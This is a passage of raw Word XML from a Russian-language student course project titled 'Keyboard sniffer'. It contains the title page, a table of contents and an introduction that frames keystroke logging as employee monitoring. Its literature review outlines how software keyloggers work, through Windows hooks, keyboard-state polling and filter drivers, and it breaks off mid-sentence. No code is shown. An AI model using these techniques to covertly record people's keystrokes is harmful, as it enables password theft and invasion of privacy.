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332" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22E07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Министерство образования Республики Беларусь</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F073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E22E0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07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F073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E22E0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F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F073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E22E07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F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F073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F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22E07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Факультет компьютерных систем и сетей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22E07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кафедра электронных вычислительных машин</w:t>
      </w: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Pr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="009320C8" w:rsidRDefault="00F07332" w:rsidP="00F073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9320C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07332" w:rsidRPr="009320C8" w:rsidRDefault="00F07332" w:rsidP="00F073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9320C8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F07332" w:rsidRPr="009320C8" w:rsidRDefault="00F07332" w:rsidP="00F07332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9320C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на тему</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="00584F71" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>СНИФФЕР КЛАВИАТУРЫ</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>БГУИР КП 1-40 02 01 01 023 ПЗ</w:t>
      </w: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Pr="009320C8" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="009320C8" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr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Pr="00E22E07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">уппы </w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">350501: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ешко В.Р.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F07332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  <w:r w:rsidRPr="00E22E0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ночкин</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E0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22E07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Pr="00E22E07">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRPr="00E22E07" w:rsidRDefault="00F07332" w:rsidP="00F07332">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F07332" w:rsidRDefault="00F07332" w:rsidP="00F0733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СК</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E07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</w:p>
    <w:p w:rsidR="00F07332" w:rsidRDefault="00F0733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hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:id w:val="130612220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1B7A51" w:rsidRPr="001B7A51" w:rsidRDefault="001B7A51">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="005655AC" w:rsidRDefault="001B7A5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B7A51">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="001B7A51">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="001B7A51">
            <w:rPr>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc420752642" w:history="1">
            <w:r w:rsidR="005655AC" w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ВВЕДЕНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420752642 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="005655AC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005655AC" w:rsidRDefault="005655AC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52643" w:history="1">
            <w:r w:rsidRPr="00055C33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C33">
              <w:rPr>
                <w:rStyle w:val="a3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5AC" w:rsidRDefault="005655A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52644" w:history="1">
            <w:r w:rsidRPr="00055C33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C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Спецификация клавиатурных снифф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5AC" w:rsidRDefault="005655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52645" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Наиболее популярные технические подходы к построению программных клавиатурных сниффе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5AC" w:rsidRDefault="005655AC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52646" w:history="1">
            <w:r w:rsidRPr="00055C33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C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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5AC" w:rsidRDefault="005655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52647" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Способ взаимодействия пользователя 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5AC" w:rsidRDefault="005655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52648" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Структурная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5AC" w:rsidRDefault="005655AC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52649" w:history="1">
            <w:r w:rsidRPr="00055C33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C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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5AC" w:rsidRDefault="005655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52650" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Низкоуровневый ху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5AC" w:rsidRDefault="005655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52651" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Процедура установ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5AC" w:rsidRDefault="005655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52652" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Процедура инжекци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5AC" w:rsidRDefault="005655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52653" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Процедура получения снимка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5AC" w:rsidRDefault="005655AC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52654" w:history="1">
            <w:r w:rsidRPr="00055C33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C33">
              <w:rPr>
                <w:rStyle w:val="a3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655AC" w:rsidRDefault="005655AC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52655" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a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5C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ТЕСТИРОВ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5AC" w:rsidRDefault="005655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52656" w:history="1">
            <w:r w:rsidRPr="00055C33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5AC" w:rsidRDefault="005655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52657" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
                <w:lang w:eastAsia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5AC" w:rsidRDefault="005655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52658" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a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5AC" w:rsidRDefault="005655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52659" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг кода исполняемого фай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5AC" w:rsidRDefault="005655A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52660" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Листинг</w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>кода</w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>инжектируемой</w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>библиотеки</w:t>
            </w:r>
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3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5AC" w:rsidRDefault="005655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52661" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3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5AC" w:rsidRDefault="005655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752662" w:history="1">
            <w:r w:rsidRPr="00055C33">
              <w:rPr>
                <w:rStyle w:val="a3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51" w:rsidRDefault="001B7A51">
          <w:r w:rsidRPr="001B7A5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8372C" w:rsidRDefault="00E8372C" w:rsidP="00E8372C"/>
    <w:p w:rsidR="00E8372C" w:rsidRPr="00F07332" w:rsidRDefault="00586F70" w:rsidP="00F07332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5478C2" w:rsidRPr="00F07332" w:rsidRDefault="005478C2" w:rsidP="00F07332">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc414805627"/>
      <w:bookmarkStart w:id="2" w:name="_Toc419842033"/>
      <w:bookmarkStart w:id="3" w:name="_Toc420705252"/>
      <w:bookmarkStart w:id="4" w:name="_Toc420752642"/>
      <w:r w:rsidRPr="00F07332">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00F07332">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="005478C2" w:rsidRDefault="005478C2" w:rsidP="005478C2">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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, в котором живет современный человек, характеризуют как информационное. Компьютеры получают все более широкое применение – даже там, где, как казалось совсем недавно, их применить невозможно. Информационные технологии и их знание становится неотъемлемой частью жизни любого человека, и в основу применения этих технологий также легло применение компьютера. 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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сегодня большая часть работы выполняется с использованием компьютера: электронных документов, файлов, программ и сайтов. Неудивительно, что хронометраж рабочего времени за компьютером так популярен сейчас. С его помощью можно проанализировать рабочий процесс и выявить резервы времени.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rStyle w:val="a6"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Учет деятельности за компьютером</w:t>
      </w:r>
      <w:r w:rsidRPr="00640A3A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — дешевый и полностью объективный способ. Он идеально подходит для офисного персонала, который большую часть времени проводит на рабочем месте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> за компьютером</w:t>
      </w:r>
      <w:r w:rsidRPr="00640A3A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005478C2" w:rsidRPr="00640A3A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фферы клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> принадлежат к той группе программных продуктов, которые осуществляют контроль над деятельностью пользователя персонального компьютера.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> П</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рограммные про</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дукты этого типа предназначаются</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> исключительно для записи информации о нажатиях клавиш клавиатуры, в том числе и системных, в специализированный журнал регистрации (лог-файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>), который впоследствии изучается</w:t>
      </w:r>
      <w:r w:rsidRPr="005478C2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> человеком, установившим эту программу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646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:rsidR="009C1400" w:rsidRPr="009C1400" w:rsidRDefault="009C1400" w:rsidP="009C1400"/>
    <w:p w:rsidR="00A9269C" w:rsidRPr="00F07332" w:rsidRDefault="00E47FA2" w:rsidP="00F07332">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc419842034"/>
      <w:bookmarkStart w:id="6" w:name="_Toc420705253"/>
      <w:bookmarkStart w:id="7" w:name="_Toc420752643"/>
      <w:r w:rsidRPr="00F07332">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00F07332">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>БЗОР ЛИТЕРАТУРЫ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="008E593B" w:rsidRDefault="008E593B" w:rsidP="00F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будут рассмотрены основные теоретические сведения, необходимые для создания программы «Сниффер клавиатуры».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="00532646" w:rsidRDefault="00532646" w:rsidP="00F97D6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="00A9269C" w:rsidRDefault="00532646" w:rsidP="008B09E8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="283"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc420705254"/>
      <w:bookmarkStart w:id="9" w:name="_Toc420752644"/>
      <w:r w:rsidRPr="00532646">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Спецификация клавиатурных снифферов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRDefault="00532646" w:rsidP="00F97D6F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532646">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Клавиатурный сниффер — это программное обеспечение или аппаратн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ое устройство, регистрирующее </w:t>
      </w:r>
      <w:r w:rsidRPr="00532646">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нажатия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>клавиш на клавиатуре компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00532646" w:rsidRPr="00F02139" w:rsidRDefault="00532646" w:rsidP="00F97D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виатурные снифферы подразделяются на </w:t>
      </w:r>
      <w:r w:rsidR="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">аппаратные и программные. </w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Первые представляют собой небольшие устройства, которые могут быть закреплены на клавиатуре, проводе или в системном блоке компьютера. Вторые — это специально написанные программы, предназначенные для отслеживания нажатий клавиш на клавиатуре и ведения журнала нажатых клавиш.</w:t>
      </w:r>
      <w:r w:rsidR="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Принципиальная идея сниффера</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> состоит в том, чтобы внедриться между любыми двумя звеньями в цепи прохождения сигнала от нажатия пользователем клавиш на клавиатуре до появления символов на экране</w:t>
      </w:r>
      <w:r w:rsidR="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008B09E8" w:rsidRDefault="008B09E8" w:rsidP="008B09E8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284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20705255"/>
      <w:bookmarkStart w:id="11" w:name="_Toc420752645"/>
      <w:r w:rsidRPr="008B09E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.2 Наиболее</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008B09E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> популярные технические подходы к построению программных клавиатурных снифферов</w:t>
      </w:r>
      <w:r w:rsidRPr="008B09E8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0"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="008F6440" w:rsidP="008B09E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing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системная ловушка на сообщения о нажатии клавиш клавиатуры (устанавливается с помощью функции WinAPI SetWindowsHook, для того чтобы перехватить сообщения,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> посылаемые оконной процедуре.</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="008F6440" w:rsidP="008B09E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циклический опрос клавиатуры (с помощью функции WinAPI Get(Async)KeyState, GetKeyboardSta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>te).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRDefault="008F6440" w:rsidP="008B09E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драйвер-фильтр стека клавиатурных драйвер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ов ОС Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRDefault="008F6440" w:rsidP="008B09E8">
      <w:pPr>
        <w:spacing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Кейлоггеры могут внедряться в любом месте последовательности обработки, перехватывая данные о нажатых клавишах, передаваемые одной подсистемой обработки следующей подсистеме в цепочке обработчиков.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B3D75" w:rsidRDefault="006B3D75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</w:p>
    <w:p w:rsidR="008F6440" w:rsidRDefault="008F6440" w:rsidP="008B09E8">
      <w:pPr>
        <w:spacing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lastRenderedPageBreak/>
        <w:t>Установка ловушки для клавиатурных сообщений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F6440" w:rsidRPr="008F6440" w:rsidRDefault="00F97D6F" w:rsidP="008B09E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F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>то самый распространен</w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный метод реализации клавиатурных снифферов</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Посредством вызова функции SetWindowsHookEx </w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сниффер</w:t>
      </w:r>
      <w:r w:rsidR="008F6440" w:rsidRPr="008F6440">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> устанавливает глобальную ловушку на клавиатурные соб</w:t>
      </w:r>
      <w:r w:rsidR="006B3D75">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
